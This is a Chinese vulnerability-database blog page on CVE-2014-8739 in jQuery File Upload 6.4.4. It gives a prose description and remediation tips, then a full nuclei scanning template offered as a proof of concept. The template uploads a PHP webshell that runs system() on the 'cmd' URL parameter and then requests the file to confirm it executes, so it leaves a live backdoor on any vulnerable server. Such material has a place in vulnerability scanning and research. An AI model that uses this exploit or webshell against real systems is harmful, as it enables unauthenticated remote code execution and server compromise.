jQuery File Upload 644 - Unrestricted File Upload

漏洞信息

漏洞名称: jQuery File Upload 6.4.4 - Unrestricted File Upload

漏洞编号:

  • CVE: CVE-2014-8739

漏洞类型: 文件上传

漏洞等级: 严重

漏洞描述: jQuery File Upload是一个流行的文件上传插件,广泛应用于各种网站和Web应用中,用于实现用户文件上传功能。由于其易用性和灵活性,它在许多企业级服务和Web应用组件中被采用。该插件允许用户通过简单的界面上传文件到服务器,支持多种文件类型和大小的上传。然而,版本6.4.4中存在一个严重的安全漏洞,允许攻击者上传任意文件,包括恶意的PHP文件,从而导致远程代码执行。

漏洞的技术根源在于server/php/UploadHandler.php文件中缺乏对上传文件类型的严格验证。攻击者可以绕过前端验证,直接上传PHP文件到服务器。由于服务器没有对上传的文件类型进行严格检查,攻击者上传的PHP文件可以被服务器执行,从而允许攻击者在服务器上执行任意代码。这种漏洞通常被称为“无限制文件上传漏洞”,它利用了应用程序对用户输入的不当处理。

此漏洞的影响极为严重,因为它允许远程攻击者在无需任何身份验证的情况下,上传并执行恶意代码,完全控制受影响的Web服务器。攻击者可以利用此漏洞窃取敏感数据、破坏网站内容、甚至利用服务器作为跳板进行进一步的网络攻击。由于漏洞的利用简单且效果显著,它被列为“严重”级别。为了防止此类攻击,建议用户立即升级到修复了此漏洞的jQuery File Upload版本,并在服务器端实施严格的文件类型验证和上传目录权限控制。

产品厂商: jquery_file_upload_project

产品名称: jQuery File Upload

影响版本: 6.4.4

来源: https://github.com/projectdiscovery/nuclei-templates/blob/8e1309a4dd5e28c99cfc82f1032927c9eb76d00d/http%2Fcves%2F2014%2FCVE-2014-8739.yaml

类型: projectdiscovery/nuclei-templates:github issues

POC详情

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154

id: CVE-2014-8739

info:
  name: jQuery File Upload 6.4.4 - Unrestricted File Upload
  author: pranjal
  severity: critical
  description: jQuery File Upload Plugin 6.4.4 contains an unrestricted file upload caused by lack of validation in server/php/UploadHandler.php, letting remote attackers execute arbitrary PHP code by uploading PHP files, exploit requires uploading a PHP file with a PHP extension and accessing it directly.
  impact: |
    Successful exploitation of this vulnerability can lead to remote code execution by uploading malicious PHP files, potentially compromising the entire web application and server.
  remediation: |
    - Upgrade to a patched version of jQuery File Upload plugin
    - Implement proper file type validation on the server side
    - Restrict upload directories and file permissions
    - Use whitelist approach for allowed file extensions
  reference:
    - https://www.exploit-db.com/exploits/35057/
    - https://www.exploit-db.com/exploits/36811/
    - https://nvd.nist.gov/vuln/detail/CVE-2014-8739
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2014-8739
    cwe-id: CWE-434
    epss-score: 0.94326
    epss-percentile: 0.99943
    cpe: cpe:2.3:a:jquery_file_upload_project:jquery_file_upload:*:*:*:*:*:*:*:*
  metadata:
    max-request: 3
    vendor: jquery_file_upload_project
    product: jquery_file_upload
    verified: true
  tags: cve2014,cve,edb,jquery,file-upload,rce,kev

variables:
  randstr: "{{randstr}}"
  php_payload: |
    <?php
    echo "{{randstr}}";
    if(isset($_GET['cmd'])) {
        system($_GET['cmd']);
    }
    ?>

http:
  # Step 1: Check if the vulnerable endpoint exists and identify jQuery File Upload
  - method: GET
    path:
      - "{{BaseURL}}/server/php/"

    matchers-condition: and
    matchers:
      - type: regex
        regex:
          - '^{\"files\":\s*\[\]'
        part: body

      - type: word
        part: body
        words:
          - "files"
        condition: and

      - type: status
        status:
          - 200

      - type: word
        part: header
        words:
          - "Content-Type: text/plain;charset=UTF-8"
        condition: and

    extractors:
      - type: regex
        name: upload_url
        part: body
        regex:
          - '"url":\s*"([^"]+)"'
          - '"upload_url":\s*"([^"]+)"'

  # Step 2: Attempt to upload a PHP file with specific jQuery File Upload response patterns
  - method: POST
    path:
      - "{{BaseURL}}/server/php/"

    headers:
      Content-Type: multipart/form-data; boundary=----WebKitFormBoundary{{randstr}}

    body: |
      ------WebKitFormBoundary{{randstr}}
      Content-Disposition: form-data; name="files[]"; filename="{{randstr}}.php"
      Content-Type: application/x-php

      {{php_payload}}
      ------WebKitFormBoundary{{randstr}}--

    matchers-condition: and
    matchers:
      - type: regex
        regex:
          - '"files":\s*\[[^\]]*"[^"]*{{randstr}}[^"]*"'
        part: body

      - type: word
        part: body
        words:
          - "files"
          - "{{randstr}}"
        condition: and

      - type: status
        status:
          - 200

      - type: word
        part: header
        words:
          - "Content-Type: text/plain;charset=UTF-8"
        condition: and

    extractors:
      - type: regex
        name: uploaded_file
        part: body
        regex:
          - '"name":\s*"([^"]+)"'
          - '"url":\s*"([^"]+)"'

  # Step 3: Verify the uploaded file is accessible and contains our unique payload
  - method: GET
    path:
      - "{{BaseURL}}/server/php/files/{{randstr}}.php"

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - "{{randstr}}"

      - type: status
        status:
          - 200

    extractors:
      - type: regex
        name: php_output
        part: body
        regex:
          - '{{randstr}}'

# digest: 4a0a00473045022030d53b9152e1513c3423d7cdcb1b4d794cd54be61b903513a98849ef85a7a169022100bfb0a8e2682ffeb9d07fabd8b1a238debd4d25a1790fe0b672c7289916f12b56:922c64590222798bb761d5b6d8e72950

Github Poc
#projectdiscovery/nuclei-templates:github issues #文件上传
jQuery File Upload 644 - Unrestricted File Upload
http://example.com/2025/07/29/github_1593535320/
作者
lianccc
发布于
2025年7月29日
许可协议